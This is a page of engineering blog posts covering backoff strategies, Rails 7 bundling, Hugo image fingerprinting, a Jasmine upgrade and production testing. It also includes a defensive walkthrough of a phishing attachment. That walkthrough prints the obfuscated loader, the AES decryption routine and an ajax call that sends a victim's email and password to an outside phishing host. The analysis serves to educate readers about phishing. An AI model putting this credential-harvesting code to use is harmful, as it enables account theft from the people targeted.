Updates from kmitov Toggle Comment Threads | Keyboard Shortcuts

  • kmitov 2:05 pm on November 6, 2022 Permalink |  

    Backoff strategy 

    I’ve never wondered how is it called when you attempt to call a server, and this fails and then you attempt two seconds later and it fails, and then 4 seconds later and then 8 and so on. Clearly it is exponential in nature, but never had much thought of “exponential what”.

    Turns out this is called a backoff strategy. You get to back off.

    Once we have a name we have a power over it. We can build a class or a method that is properly called backoff strategy.

    And of course, as everything else there is a “javascript framework” for back off strategies – https://github.com/kenyipp/backoff-strategies. Yes, there is a javascript framework for everything… 😀

    There is also a wikipedia article on the subject – https://en.wikipedia.org/wiki/Exponential_backoff

    Good. Learned something today. Now I can explain it, because I have a name and I have power over it.

     
  • kmitov 9:09 am on May 30, 2022 Permalink |  

    Esnaf 

    Go an see the product at https://esnaftoys.com/products/nordic-fox-wooden-magnetic-toy-design

    Nfox_3d_toy

     
  • kmitov 9:01 am on April 6, 2022 Permalink |
    Tags: , , ui, ux   

    How a bad UI message prevented us from resolving a 5 days feature downtime 

    This article is about a UI message in our platform that was confusing enough that it prevented us from resolving a 5 days downtime on a feature. We could have resolved it much faster, but because the message was confusing it made things worse. I hope that UI experts and engineers (like us) could benefit and get an insight of how some things are confusing to the users.

    Context

    Our https://www.buildin3d.com service for visualizing animated and interactive 3D assembly instructions is used by one of the well known robotics education platforms https://www.fllcasts.com. At FLLCasts there are instructions of LEGO robots and mission models from the FIRST LEGO League robotics competitions. Here is an example instruction – https://www.fllcasts.com/materials/1393-bag-12-helicopter-with-food-package-first-lego-league-2021-2022-cargo-connect

    On the left you see the message “Downloading initial steps…’

    Problem

    5 days ago a user wrote a ticket to us with a question:

    “Why can’t I download the instructions?”.


    I naturally responded to the user “Well, you can’t because this is how we’ve built them to work. They are open in the browser and they can not be downloaded. What are you trying to do anyway?” (oh, my ignorance)

    The user replied in the ticket

    “I just want to build them.”

    Obviously there was a great miscommunication between us. The user was trying to build the instructions, but was using the term “Download”. Why? Well, because we taught them so.

    5 days later I found out the following thing. Some of the instructions were not working. When users were visiting them we, as “ignorant engineers” were showing a message that said “Downloading initial steps…” while the instruction was loading. In our engineering mind we were really downloading the instruction to the browser. Some of the steps of the instruction were downloaded from the server to the client, which is the browser.

    When the user got in touch with us he said “Hey, why can’t I download the instructions”.
    When asked this question I assumed in the ticket that the user wanted to download the instructions on their file system and be able to open them from there in an offline mode. Which is generally what “Download” means. I made a really wrong assumption of what the user was trying to do. He was trying to load and view the instructions. He was not trying to “Download” them. But we were telling them that we are “Downloading” the instructions and they naturally used this term.

    The implications

    For 5 days about 5-6% of our instructions were not working correctly. We could have resolved this the right way if I paid a little more attention to what the user was asking in the ticket or if the message was “Loading initial steps…” instead of “Downloading initial steps…”

    You learn something every day.

     
  • kmitov 10:38 pm on January 13, 2022 Permalink |
    Tags: bootstrap, cssbundling-rails, jsbundling-rails, , rails 7,   

    Rails 7 with bootstrap 5 by cssbundling-rails with dart-sass and jsbundling-rails with esbuild. No webpack and webpacker and a salt of Stimulus 

    Today I put on my “new to Rails hat” and I decided to start a new Rails 7 project using the latest two new sharp knives that we have with Rails 7 to get a job done.

    The Job To Be Done is: Demonstrate Bootstrap 5 examples of a Toast in a Rails 7 project.

    This is a simple example of a popular Bootstrap 5 component that has both css and js involved. My goal is to build a website that will show a button and when the button is clicked a Toast will be visualised as it is in https://getbootstrap.com/docs/5.0/components/toasts/#live

    Provide sharp knives and the menu is omakase

    These are two points of Rails doctrine. The menu is omakase, which means that we have a good default for the tools that we are using. We are also given sharp knives to use – cssbundling-rails, jsbundling-rails, Stimulus, dart-sass, esbuild.

    The process

    I would like to bundle bootstrap 5 in the application. One of the options is to take bootstrap from npm and I would like to demonstrate how we bundle bootstrap from npm. Note that this might not be the right choice for you.

    NPM version

    Make sure you have npm 7.1+. I was trying for more than an hour to identify an error because my npm version was 6.X

    $ npm --version

    Rails 7 project

    # We pass in the option --css bootstrap that will configure most things for us
    $ rails _7.0.1_ new bProject --css bootstrap
    # enter the project folder
    $ cd bProject

    Everything is installed. You have all the dependencies to bootstrap, there is a node_modules folder containing node modules like bootstrap.

    Bundling the CSS

    cssbundling-rails gem is installed by default in the gem file.

    There is an app/assets/stylesheet/application.bootstrap.scss that imports the bootstrap css.

    It’s content is:

    @import 'bootstrap/scss/bootstrap';

    We would be using sass (again from npm) to build this .scss file. There is a script in the package.json

    {
      "name": "app",
      "private": "true",
      "dependencies": {
        "@hotwired/stimulus": "^3.0.1",
        "@hotwired/turbo-rails": "^7.1.0",
        "@popperjs/core": "^2.11.2",
        "bootstrap": "^5.1.3",
        "esbuild": "^0.14.11",
        "sass": "^1.48.0"
      },
      "scripts": {
        "build": "esbuild app/javascript/*.* --bundle --sourcemap --outdir=app/assets/builds",
        "build:css": "sass ./app/assets/stylesheets/application.bootstrap.scss ./app/assets/builds/application.css --no-source-map --load-path=node_modules"
      }
    }

    The script build:css will take the app/assets/stylesheets/application.bootstrap.scss and will produce an app/assets/builds/application.css

    The file application.css is the one that our application will be using. It is referred in application.html.erb as
    <%= stylesheet_link_tag “application”, “data-turbo-track”: “reload” %>

    <!DOCTYPE html>
    <html>
      <head>
        <title>BProject</title>
        <meta name="viewport" content="width=device-width,initial-scale=1">
        <%= csrf_meta_tags %>
        <%= csp_meta_tag %>
    
        <%= stylesheet_link_tag "application", "data-turbo-track": "reload" %>
        <%= javascript_include_tag "application", "data-turbo-track": "reload", defer: true %>
      </head>
    
      <body>
        <%= yield %>
      </body>
    </html>

    The live reload of CSS

    In order to change the css and live reload it we must start sass with –watch option as

    $ sass ./app/assets/stylesheets/application.bootstrap.scss ./app/assets/builds/application.css --no-source-map --load-path=node_modules --watch

    but don’t do this as there is a helper file that we should execute at the end of the article that is  – calling ./bin/dev

    Bundling the JavaScript

    jsbundling-rails is installed in the Gemfile.

    There is an app/javascript/application.js that imports bootstrap

    // Entry point for the build script in your package.json
    import "@hotwired/turbo-rails"
    import "./controllers"
    import * as bootstrap from "bootstrap"

    The application.js is bundled with esbuild as a tool  and the command is in the package json

    # part of package.json
    "build": "esbuild app/javascript/*.* --bundle --sourcemap --outdir=app/assets/builds",

    The result is produced in app/assets/builds

    The result is referred by the Rails Assets Pipeline and included in the html by calling javascript_inlcude_tag ‘application’ as in

    <!DOCTYPE html>
    <html>
      <head>
        <title>BProject</title>
        <meta name="viewport" content="width=device-width,initial-scale=1">
        <%= csrf_meta_tags %>
        <%= csp_meta_tag %>
    
        <%= stylesheet_link_tag "application", "data-turbo-track": "reload" %>
        <%= javascript_include_tag "application", "data-turbo-track": "reload", defer: true %>
      </head>
    
      <body>
        <%= yield %>
      </body>
    </html>

    Create a new controller

    Initial controller that will be the home screen containing the button.

    # app/controllers/home_controller.rb
    $ echo '
    class HomeController < ApplicationController
    
      def index
      end
    end
    ' > app/controllers/home_controller.rb

    Create a views folder

    # views folder
    $ mkdir app/views/home

    Create the view

    It contains a button and a toast.

    $ echo '
    <!-- app/views/home/index.html.erb -->
    <h1>Title</h1>
    <div data-controller="toast">
      <button type="button" class="btn btn-primary" data-action="click->toast#show">Show live toast</button>
    </div>
    
    <div class="position-fixed bottom-0 end-0 p-3" style="z-index: 11">
      <div id="liveToast" class="toast hide" role="alert" aria-live="assertive" aria-atomic="true">
        <div class="toast-header">
          <strong class="me-auto">Bootstrap</strong>
          <small>11 mins ago</small>
          <button type="button" class="btn-close" data-bs-dismiss="toast" aria-label="Close"></button>
        </div>
        <div class="toast-body">
          Hello, world! This is a toast message.
        </div>
      </div>
    </div>
    ' > app/views/home/index.html.erb

    Note the code:

    <div data-controller="toast">
      <button type="button" class="btn btn-primary" data-action="click->toast#show">Show live toast</button>
    </div>

    Here we have a ‘data-controller’ attribute in the div element and a ‘data-action’ attribute in the button element.
    This is how we will connect Stimulus JS as a javascript framework to handle the logic for clicking on this button.

    Configure the routes

    When we open “/” we want Rails to call the home#index method that will return the index.html.erb page.

    $ echo '
    # config/routes.rb
    Rails.application.routes.draw do
      # Define your application routes per the DSL in https://guides.rubyonrails.org/routing.html
    
      # Defines the root path route ("/")
     root "home#index"
    end' > config/routes.rb

    Create a new Stimulus controller

    We will use Stimulus as a small prefered framework in Rails for doing JavaScript. When the button in the above HTML fragment is selected the method show() in the controller will be called.

    # Use the helper method to generate a stimulus controller
    $ bin/rails generate stimulus toastController
    
    # create the content of the controller
    $ echo '
    // app/javascript/controllers/toast_controller.js
    import { Controller } from "@hotwired/stimulus"
    import { Toast } from "bootstrap"
    
    // Connects to data-controller="toast"
    export default class extends Controller {
    
      connect() {
      }
    
      show() {
        const toastElement = document.getElementById("liveToast")
        const toast = new Toast(toastElement)
        toast.show();
      }
    }
    ' > app/javascript/controllers/toast_controller.js

    Start the dev servers for rails, jsbundling-rails and cssbundling-rails

    $ ./bin/dev

    Visit localhost:3000

    There is a button that could be selected and a toast will appear.

     
  • kmitov 1:25 pm on December 19, 2021 Permalink |
    Tags: hugo, jamstack,   

    Classic challenge, new tool – addressing browser image caching issues with Hugo fingerprinting 

    Have you ever been on a support call with a service/vendor and they tell you – “Please, clear your browser cache!”

    Or you’ve been on the development side of a website and you upload a new image on your website only for users to continue reporting that they still see the old image. Then you have to ask all of your users to refresh their browser, which is not an easy thing to do.

    It’s a classic challenge with caching of assets like images and it generally has only one solution working in all cases.

    Recently we had the same challenge with the new website at BeMe.ai and I thought: “Let’s explore a tool from the perspective of this challenge”. The tool is a static website generator called Hugo and the job to be done is to address the image caching challenge so that our parents of autistic children always see the latest image on our website developed by our illustrator – Antonio.

    (image of a parent and a an autistic child. Used at https://beme.ai)

    In this article I will go through what the challenge is, why there is a caching challenge, how it could be addressed without any framework, with Rails (Ruby on Rails) and with Hugo. My hope is to give you a good understanding of how the Hugo team thinks, in what terms and in what direction. This is not a Hugo tutorial, but more how I’ve focused on one challenge and tried to address it with Hugo.

    The challenge of browser caching

    When browsers visualise a webpage with images they request images from the server where the website is hosted. Images require much more bandwidth then text. Next time you visit the same website the browser will request the same image that will again require traffic. Images do not change often on websites so browsers prefer to cache the image – which means they are saved on the local storage of your device, be it mobile or desktop. Next time when you as a user open the same webpage the browser will not make a request to the server to get the same image as there is a copy of this same image already in your local storage.

    The question here is how does the browser know that the image it has in its local storage is the same image as the one that is on the server. What if you’ve changed the image in the meantime and there is a new version on the server. It happened with us and an image that Antonio developed.

    The answer is remarkably simple: The browser knows if the image in its local storage and the image on the server are the same if they have the same “url/name”.

    Let me illustrate a scenario

    A week ago:
    A parent visited our website. The browser visualised the image called – parent-with-child.png
    It stores a copy of parent-with-child.png in its local storage.

    Image from BeMe.ai that had the wrong dashboard on the phone

    Two days ago:
    Antonio developed a new image of the parent and the child and we uploaded it at BeMe.ai. From now on the image located on parent-with-child.png is the second version.

    Image improved by Antonio to have the correct dashboard on the phone. Taken from the BeMe.ai website.

    Today:
    The same parent again visits the website. The browsers asked the server what’s on the page and the server responded that the page contains a link to parent-with-child.png. As the browser already has a local copy of the parent-with-child.png it will not request this resource from the server. It will just use the local copy. This saves the bandwidth and the site is opened faster. It’s a better experience, but it is the old image.

    Which one will be shown to the user:

    What really makes this problem difficult is the fact that different browsers will behave in different ways. The internet has tried many different solutions including different headers in the HTTP protocol to address this challenge. Still, there are times when the user will just not see the new version of the image. It could drive you really crazy as it will be some users seeing the new version and some seeing the old.

    How big of a challenge is this?

    Technically it is not a great challenge, yet I’ve seen experienced engineers miss this small detail. I’ve missed it a couple of times. Every such case is a load on the support channel of your organisation and on the engineering. So better avoid any caching issues at all.

    What’s the solution?

    There are many solutions. There is only one that works across all browsers and devices and across all versions of the HTTP protocol that power the internet.
    The solution is remarkably simple:
    The browser will look at the URL of the image. If there is a local copy stored for this URL, the browser will use the local copy. If there is no local copy for the URL the browser will request the new image.

    Everything we have to do is next time we change the parent-with-child.png image to upload the image with a new file name. Probably parent-with-child-v2.png is a good new name.
    Other good names include:

    1. parent-with-child-2021-12-19-13-15.png (it has the date and time on which it was uploaded)
    2. parent-with-child-with-an-added-book.png (it is different and descriptive)
    3. parent-with-child-1639913778.png (it has in its name the time in seconds since the UNIX epoch when the file was created)
    4. parent-with-child-2f11cf241d023448c988c3fc807e7678.png (it has an MD5 hash code)
    5. parent-with-child-a6e0922d83d80151fb73210187a9fb55ee2c5d979177c339f22cb257dead8a56.png (it has a SHA256 sum as it’s name)

    All it takes to resolve the browser caching challenge is to change the name of the picture when you upload it and to change it to something unique.

    That’s all it takes – no need for frameworks and fingerprinting and assets precompilation and all the other things that follow in the article.

    All it takes to address and successfully resolve any browser image caching issue is to change the name of the image next time you upload a new version of it.

    Why does the simple solution not work?

    I think it does not work because we are humans and we forget. We create a new version of the parent-with-child.png image and we forget to change the name of the image. That’s it. We just forget.

    Computers on the other hand are good at reminding us of things and of doing dull work that we often forget to do. What we could ask the computer to do is to create a new name for the image everytime we upload a new version. Enter fingerprinting?

    Fingerprinting

    Fingerprinting is the process of looking at the bits of the image (or generally any file) and calculating a checksum. The checksum will be unique for every file. After we calculate the checksum we add the checksum to the name of the file.

    Example:

    1. We upload the original parent-with-child.png image and the computer calculates a checksum a6e0922d83d80151fb73210187a9fb55ee2c5d979177c339f22cb257dead8a56. Then it sets the name of the file to be parent-with-child-a6e0922d83d80151fb73210187a9fb55ee2c5d979177c339f22cb257dead8a56.png on the server
    2. We upload a new version of parent-with-child.png image and the computer calculates its checksum that is cdc72fa95ca711271e9109b8cab292239afe5d1ba3141ec38b26d9fc8768017b. Then the computers sets the name of the file to be parent-with-child-cdc72fa95ca711271e9109b8cab292239afe5d1ba3141ec38b26d9fc8768017b.png on the server
    3. We upload a new version, a new checksum is calculated and new name is generated. And this is done with every new image.

    How checksums are calculated is a topic for another article. Computers are good and fast at calculating checksum. Humans are terrible. Like literally it will probably take us days of manual calculations to come up with the checksum of an image file if we do it by hand.

    What’s difficult with fingerprinting?

    The difficult part is not the fingerprinting part. What’s difficult is finding every HTML page on your website where the image
     parent-with-child-a6e0922d83d80151fb73210187a9fb55ee2c5d979177c339f22cb257dead8a56.png is used and replacing this name with parent-with-child-cdc72fa95ca711271e9109b8cab292239afe5d1ba3141ec38b26d9fc8768017b.png.

    This means every occurance of on the website

    <img src="https://www.beme.ai/images/parent-with-child-a6e0922d83d80151fb73210187a9fb55ee2c5d979177c339f22cb257dead8a56.png"></img>

    should be updated to contain the new url

    <img src="https://www.beme.ai/images/parent-with-child-cdc72fa95ca711271e9109b8cab292239afe5d1ba3141ec38b26d9fc8768017b.png"></img>

    The good thing is that computers are also good at this – searching through the content of many files and replacing specific parts of this file with new content.

    What needs to be implemented then? What’s the process?

    What we need from our process of deploying new versions of images to our website is the following:

    1. Ask our illustrator, Antonio in our case, to develop a new version of the parent-and-child.png image.
    2. Put this new picture on our website and the computer should magically:
        – calculate a new checksums of the image and change the name of the parent-and-child.png, eg. fingerprint the image
        – find all references on our website to the previous version of the image and replace each reference with the new name of the image
       

    Pure Bash and Linux implementations

    Linux provides simple tools as sha256sum, grep, sed, mv and in a combination with such tools we can come up with a pretty decent solution. I am not going to do that because we might decide it is a good idea to do it in this way. This might take us on a path where we are reinventing the wheel with different bash scripts all over the infrastructure and code, and there is no need to do this. If you are already on this path I can not stop you, but I don’t want to be the one guiding you on this path. Been there, done that and after many years I realised that it was not a very wise decision.

    Doing it the Rails way

    I am a big fan of Rails. Rails address the browser image caching challenge with something called “Assets Pipeline”

    When we do in rails is to use the image_tag method in all HTML pages. The syntax below is an ERB template where we use “<%  %>” inside the HTML when processing it on the server side.

    <div class="container">
      <!-- Logo -->
      <%= link_to image_tag("logo.png", alt: "BeMe.ai", class: "img-fluid", width:55), main_app.root_path,{ class: "navbar-brand" }%>
      <!-- End Logo -->

    Note that here we use the name of “logo.png” and the image_tag method handles everything for us

    <div class="container">
      <a class="navbar-brand" href="/"><img alt="BeMe.ai" class="img-fluid" width="55" src="/assets/logo-60ffa36d48dfd362e6955b36c56058487272e3030d30f0b6b40d226b8e956a2b.png"></a>

    Note how the file that we referred as logo.png in the template now becomes /assets/logo-60ffa36d48dfd362e6955b36c56058487272e3030d30f0b6b40d226b8e956a2b.png in the file visualised on the client.

    Rails has done everything to us – fingerprinting and replacing. Thanks to the Assets Pipeline in Rails we’ve successfully resolved the browser image caching challenge.

    Doing it the Hugo way

    Hugo is different from Rails. Hugo is a static website generator and it thinks in terms different from Rails. Yet, it has a Hugo Pipeline. Before we enter into the Hugo Pipeline it is good to have a small introduction to Hugo.

    Hugo allows authors to create markdown documents

    Hugo is thinking about the authors. It gives a chance to include team members to develop the content of the website and it does not have to be team members that know how to start & deploy Rails applications. Which is good.

    This means that authors could create a markdown document like this

    # Basic misconceptions about autism
    
    In this blog post we will talk about basic misconceptions about autism.
    
    Let's start with this picture of an autistic child and a parent
    
    ![Picture of misconceptions](https://www.beme.ai/parent-and-child.png)
    
    ...

    As a markdown document this is something that someone with medical knowledge could develop the content and there is no need to have someone with medical and HTML/Rails/Web Development expertise (and such people are difficult to find)

    Now the author has added a new version of the parent-and-child.png image and it again has the name parent-and-child.png. We should somehow ask Hugo to add a fingerprint and replace all the references to the image with a reference to the new image.

    Hugo in 1 paragraph – content, layouts, markdown hooks

    In Hugo the content developers write the content in Markdown format. The engineer creates the HTML layouts. Hugo takes the layout and adds the content to the layout to generate the HTML page that should be visualised to the user. Everytime a Markdown element is converted to an HTML, Hugo calls a Markdown hook. The job of the hook is to convert the Markdown to an HTML. The logic of the hook is implemented with the Go Template Language. There are default implementations of hooks for every markdown element. We can override the default implementation of the hook that converts the Markdown containing the image parent-and-child.png to an HTML, by creating a file layouts/_default/_markup/render-image.html

    Fingerprinting of content images in Hugo with the Hugo Pipeline

    Fingerprinting of content images is not enabled by default. We should be explicit that we want it. Hugo Pipeline handles the rest with methods like “fingerprint”

    Here is the content of layouts/_default/_markup/render-image.html

    <!-- layouts/_default/_markup/render-image.html -->
    
    {{/* Gets a resource object from the destination of the image that is parent-with-child.png */}}
    {{/* The parent-with-child.png image is specified in the markdown and must be available in the  */}}
    {{/* asset folder */}}
    {{ $image := resources.GetMatch .Destination }}
    
    {{/* Calculate the fingerprint, add it to the name and get the Permalink is the full URL of the file */}}
    {{ $image := ($image | fingerprint).Permalink }}
    
    <img src="{{ $image }}"/>

    When processed Hugo will generate an index.html file that contains:

    <img src="http://example.org/parent-and-child.a6e0922d83d80151fb73210187a9fb55ee2c5d979177c339f22cb257dead8a56.png"

    Summary

    Image fingerprinting is guaranteed to resolve the browser caching challenge 100% of the cases.
    It is a topic that is often overlooked, both by content developers and engineers.
    Without it we often end up with users seeing the wrong images and having the “Clear their browser cache and refresh again.”
    It is easy to address it with many different available tools.

    We’ve looked at how to implemented it with
      – Linux
      – Rails
      – Hugo
     
    Asking users to “clear browser cache” and “refresh a website” is a failure of the process and the engineering organisation. It should not happen, and I am sure we could be better than this.

     
  • kmitov 6:39 pm on December 18, 2021 Permalink
    Tags: design   

    Be brave, be bold… but not so much – a thing we learned from designing a single page website with a video 

    This content is password protected. To view it please enter your password below:

     
  • kmitov 11:30 am on November 26, 2021 Permalink |
    Tags: apple, payment   

    Unsettled: The Future of Apple’s 30% Cut (by Fastspring) 

    I tried to do a quick summary in our team about what is coming from the Epic vs Apple case. After looking at a few different resources I think the following webinar gives a good understand of what is happening

    (source https://fastspring.wistia.com/medias/tutvwsihof)

    Current status summary

    1. There is a new possible “Web flow” that opens a lot of possibilities that previously were note possible.
    2. You are more flexible to target users in specific ways
    3. We have an unlock Optimization for customer lifetime value – Retention, Cross sell
    4. The future might be – enter the app ecosystem and then use web flow outside of Apple for cross sell, sell, communication.
    5. There might be less “Paid” app going forward. There will be a move to “Subscription”
    6. It is more likely for change to come from Regulatory and Government efforts than from Court rulings
     
  • kmitov 7:16 am on November 16, 2021 Permalink |
    Tags:   

    How they tried to compromise our CEO and what a phishing email contains 

    Are you curious about what is inside those phishing emails and how they try to steal your password?

    This is the story of what happens when you click on one of the phishing emails that we receive so often. If you’ve ever been curious about how these emails work, and how they look, I will be happy to help without burdening you with tech details.

    A couple of days ago our CEO received an email that looked real, but was trying to steal her password for Microsoft Office.

    Note: Don’t click on links and email attachments. What I am doing here is demonstrating the content of one of these emails in a controlled sandbox environment.

    Content of phishing email

    This is the email. It has an attachment. Looks kind of real.

    This is how the attachment looks like:

    What could you do:

    1. Check the sender
    2. Ask your CTO/Admin/Security or somebody with good technical knowledge whether this email is ligit.
    3. Don’t click on attachments

    The attachment is an HTM file

    This file is executable on Microsoft Windows machines. Lets see the content of this file if you open it with a text editor:

    A sample of it is:

    <script language="javascript">document.write(unescape('%0D%0A%20%20%20%20%20%20%20%20%3C%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%73%3A%2F%2F%63%64...')</script>

    This file contains an HTML document. HTML is the format of webpages and once you click on this file it will open your web browser and the web browser will execute this file.

    Note: Don’t click on such attachments.

    What is unescape?

    This unescape here means that the string

    “‘%0D%0A%20%20%20%20%20%20%20%20%3C%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%73%3A%2F%2F%63%64..” is encoded.

    ‘unescape’ is a function that changes the encoding. It is technical, but at the end the goal is to make sure this file could be read by all browsers.

    The result of unescaping the content looks like:

    <script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/crypto-js.js'></script>
      <script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/aes.js'></script>
      <script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/pbkdf2.js'></script>
      <script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/sha256.js'></script>
      <script>
      function CryptoJSAesDecrypt(passphrase, encrypted_json_string){
          var obj_json = JSON.parse(encrypted_json_string);
          var encrypted = obj_json.ciphertext;
          var salt = CryptoJS.enc.Hex.parse(obj_json.salt);
          var iv = CryptoJS.enc.Hex.parse(obj_json.iv);   
          var key = CryptoJS.PBKDF2(passphrase, salt, { hasher: CryptoJS.algo.SHA256, keySize: 64/8, iterations: 999});
          var decrypted = CryptoJS.AES.decrypt(encrypted, key, { iv: iv});
          return decrypted.toString(CryptoJS.enc.Utf8);
      }
      document.write(CryptoJSAesDecrypt('978421099', '{"ciphertext":"E8jA2IVItrQQ0SW+CsN1+bRVk2bXLpW5OefWqfRyHU0qa6qTVv379y5qP2rlaRmdNkpeHJ+5t+szBF\/V7UyFG\/dxUWfgifts\/HvH38XW0qufGiryCqLxx0oo9YYtg8Qq8N1Wqg4tNiuYsdy\/RAneSerZBDpWTwUtiDE6rx6yhRNaYpRMxsUODzToXEoGWfcoFSiSAUY3mA2rhDSNeSe9WxnrMlGxRJ5VedyYDdqz8aQ24s\/Y+nIwE

    Here is what happens in the code in simple terms:

    There is an encrypted text called “ciphertext” and this cipher text is decrypted and execute. This happens on the last line of the fragment above.

    So the phishing main contains an attachment, this attachment is ‘escaped’ and the ‘escaped’ content is encrypted.

    What’s the content of the ciphertext?

    The cipher text contains a web page that you browser will visualize. It looks like a real web page. It looks like a real Microsoft 365 page.

    Here is a screenshot:

    Here where you see “pesho@gmail.com” you will see your personal email.
    This makes the page look more real to you.

    The summary for now – the phishing email contains an attachment, that has an executable HTML code that is escaped, that is also encrypted, and the encrypted content contains an HTML page that looks like Microsoft login page.

    What happens when you fill your email and password?

    There is a fragment of the code of the page that looks like this:

    count=count+1
      $.ajax({
        dataType: 'JSON',
        url: 'https://sintracoopmn.com.br/process.php',
        type: 'POST',
        data:{
          email:email,
          password:password,
          detail:detail,
    
        },

    This code will send you email and password to the following webaddress https://sintracoopmn.com.br/process.php

    Let’s try it.

    I add the username pesho@gmail.com with password ‘abcd1234’

    Note that this will send my username and password to https://sintracoopmn.com.br/process.php, but will also log me in my Office 365 account.

    So I will not even understand that I was compromised.

    What can you do?

    Add a two factor authentication.

    That’s the easiest, most secure solution. Add a two factor authentication that will send you an SMS every time you login or will require you to use an authenticator app.

    If you haven’t done it already, I would advice you to do it now.

     
  • kmitov 7:13 am on November 10, 2021 Permalink |
    Tags: , , , , ,   

    Migrating to jasmine 2.9.1 from 2.3.4 for teaspoon 

    We finally decided it is probably time to try to migrate to jasmine 2.9.1 from 2.3.4

    There is an error that started occurring randomly and before digging down and investigating it and and the end finding out that it is probably a result of a wrong version, we decided to try to get up to date with jasmine.

    Latest jasmine version is 3.X, but 2.9.1 is a huge step from 2.3.4

    We will try to migrate to 2.9.1 first. The issue is that the moment we migrated there is an error

    'beforeEach' should only be used in 'describe' function

    It took a couple of minutes, but what we found out is that fixtures are used in different ways.

    Here is the difference and what should be done.

    jasmine 2.3.4

    fixture.set could be in the beforeEach and in the describe

    // This works
    // fixture.set is in the describe
    describe("feature 1", function() {
      fixture.set(`<div id="the-div"></div>`);
      beforeEach(function() {
      })
    })
    // This works
    // fixture.set is in the beforeEach
    describe("feature 1", function() {
      beforeEach(function() {
        fixture.set(`<div id="the-div"></div>`);
      })
    })

    jasmine 2.9.1

    fixture.set could be only in the describe and not in the before beforeEach

    // This does not work as the fixture is in the beforeEach
    describe("feature 1", function() {
      beforeEach(function() {
        fixture.set(`<div id="the-div"></div>`);
      })
    })
    // This does work
    // fixture.set could be only in the describe
    describe("feature 1", function() {
      fixture.set(`<div id="the-div"></div>`);  
      beforeEach(function() {
        
      })
    })
     
  • kmitov 8:57 am on October 8, 2021 Permalink |
    Tags: amazon-s3, ,   

    Sometimes you need automated test on production 

    In this article I am making the case that sometimes you just need to run automated tests against the real production and the real systems with real data for real users.

    The case

    We have a feature on one of our platforms:

    1. User clicks on “Export” for a “record”
    2. A job is scheduled. It generates a CSV file with information about the record and uploads on S3. Then a presigned_url for 72 hours is generated and an email is sent to the user with a link to download the file.

    The question is how do you test this?

    Confidence

    When it comes to specs I like to develop automated specs that give me the confidence that I deliver quality software. I am not particularly religious to what the spec is as long as it gives me confidence and it is not standing in my way by being too fragile.

    Sometimes these specs are model/unit specs, many times they are system/feature/integration specs, but there are cases where you just need to run a test on production against the production db, production S3, production env, production user, production everything.

    Go in a System/Integration spec

    A spec that would give me confidence here is to simulate the user behavior with Rails system specs.
    The user goes and click on the Export and I check that we’ve received an email and this email contains a link

      scenario "create an export, uploads it on s3 and send an email" do
        # Set up the record
        user = FactoryBot.create(:user)
        record = FactoryBot.create(:record)
        ... 
    
        # Start the spec
        login_as user
        visit "/records"
        click_on "Export"
        expect(page).to have_text "Export successfully scheduled. You will receive an email with a link soon."
    
        mail_html_content = ActionMailer::Base.deliveries.select{|email| email.subject == "Successful export"}.last.html_part.to_s
        expect(mail_html_content).to have_xpath "//a[text()='#{export_name}']"
        link_to_exported_zip = Nokogiri::HTML(mail_html_content).xpath("//a[text()='#{export_name}']").attribute("href").value
    
        csv_content = read_csv_in_zip_given_my_link link_to_exported_zip 
        expect(csv_content).not_to be_nil
        expect(csv_content).to include user.username
      end

    This spec does not work!

    First problem – AWS was stubbed

    We have a lot of other specs that are using S3 API. It is a good practice as you don’t want all your specs to touch S3 for real. It is slow and it is too coupled. But for this spec there was a problem. There was a file uploaded on S3, but the file was empty. The reason was that on one of the machines that was running the spes there was no ‘zip’ command. It was not installed and we are using ‘zip’ to create a zip of the csv files.

    Because of this I wanted to upload an actual file somehow and actually check what is in the file.

    I created a spec filter that would start a specific spec with real S3.

    # spec/rails_helper.rb
    RSpec.configure do |config|
      config.before(:each) do
        # Stub S3 for all specs
        Aws.config[:s3] = {
          stub_responses: true
        }
      end
    
      config.before(:each, s3_stub_responses: false) do
        # but for some specs, those that have "s3_stub_responses: false" tag do not stub s3 and call the real s3.
        Aws.config[:s3] = {
          stub_responses: false
        }
      end
    end

    `This allows us to start the spec

      scenario "create an export, uploads it on s3 and send an email", s3_stub_responses: false do
        # No in this spec S3 is not stubbed and we upload the file
      end

    Yes, we could create a local s3 server, but then the second problem comes.

    Mailer was adding invalid params

    In the email we are sending a presigned_url to the S3 file as the file is not public.
    But the mailer that we were using was adding “utm_campaign=…” to the url params.
    This means that the S3 presigned url was not valid. Checking if there is an url in the email was simply not enough. We had to actually download the file from S3 to make sure the link is correct.

    This was still not enough.

    It is still not working on production

    All the tests were passing with real S3 and real mailer in test and development env, but when I went on production the feature was not working.

    The problem was with the configuration. In order to upload to S3 we should know the bucket. The bucket was configured for Test and Development but was missing for production

    config/environments/development.rb:  config.aws_bucket = 'the-bucket'
    config/environments/test.rb:  config.aws_bucket = 'the-bucket'
    config/environments/production.rb: # there was no config.aws_bucket

    The only way I could make sure that the configuration in production is correct and that the bucket is set up correctly is to run the spec on a real production.

    Should we run all specs on a real production?

    Of course not. But there should be a few specs for a few features that should test that the buckets have the right permissions and they are accessible and the configuration in production is right. This is what I’ve added. Once a day a spec goes on the production and tests that everything works on production with real S3, real db, real env and configuration, the same way that users will use the feature.

    How is this part of the CI/CD?

    It is not. We do not run this spec before deploy. We run all the other specs before deploy that gives us 99% confidence that everything works. But for the one percent we run a spec once every day (or after deploy) just to check a real, complex scenario, involving the communication between different systems.

    It pays off.

     
c
compose new post
j
next post/next comment
k
previous post/previous comment
r
reply
e
edit
o
show/hide comments
t
go to top
l
go to login
h
show/hide help
shift + esc
cancel